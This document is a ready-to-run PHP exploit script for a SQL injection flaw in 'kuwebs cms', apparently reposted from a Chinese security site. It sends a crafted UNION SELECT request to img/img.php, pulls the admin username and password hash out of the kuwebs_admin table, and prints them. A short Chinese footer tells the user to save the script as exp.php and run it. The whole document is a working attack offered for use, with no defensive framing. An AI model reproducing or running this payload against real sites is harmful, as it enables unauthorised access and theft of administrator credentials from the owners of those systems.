<?php
error_reporting(E_ERROR);
print_r('
+---------------------------------------------------------------------+
kuwebs cms sql injection exp
Home: www.hkmjj.com www.2cto.com
+---------------------------------------------------------------------+
');

if ($argc < 2) {
print_r('
Usage: php '.$argv[0].' host /path
Example: php '.$argv[0].' 127.0.0.1 cc
');
die();
}
ob_start();
$host = $argv[1];
$path= $argv[2];
$sock = fsockopen($host, 80, $errno, $errstr, 30);
if (!$sock) die("$errstr ($errno)\n");
fwrite($sock, "GET /$path/img/img.php?lang=cn&itemid=58%20and%201=2%20union%20select%201,concat(0x6F756F757E,adminuser,0x2D,adminpassword,0x7E31),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+kuwebs_admin%20-- HTTP/1.1\r\n");
fwrite($sock, "Host: $host\r\n");
fwrite($sock, "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:6.0.2) Gecko/20100101 Firefox/6.0.2\r\n");
fwrite($sock, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n");
fwrite($sock, "Accept-Language: zh-cn,zh;q=0.5\r\n");
fwrite($sock, "Connection: keep-alive\r\n\r\n");
$headers = "";
while ($str = trim(fgets($sock, 1024)))
     $headers .= "$str\n";
$body = "";
while (!feof($sock))
     $body .= fgets($sock, 1024);
fclose($sock);
ob_end_flush();
//print_r($body);
if (strpos($body, 'ouou') !== false) {
preg_match('/ouou~(.*?)~1/', $body, $arr);
$result=explode("-",$arr[1]);
print_r("Exploit Success! \nusername:".$result[0]."\npassword:".$result[1]."\n");

}
else{
print_r("Exploit Failed! \n");
}
?>
 

保存 exp.php 运行

php.exe exp.php 127.0.0.1

from：hkmjj.com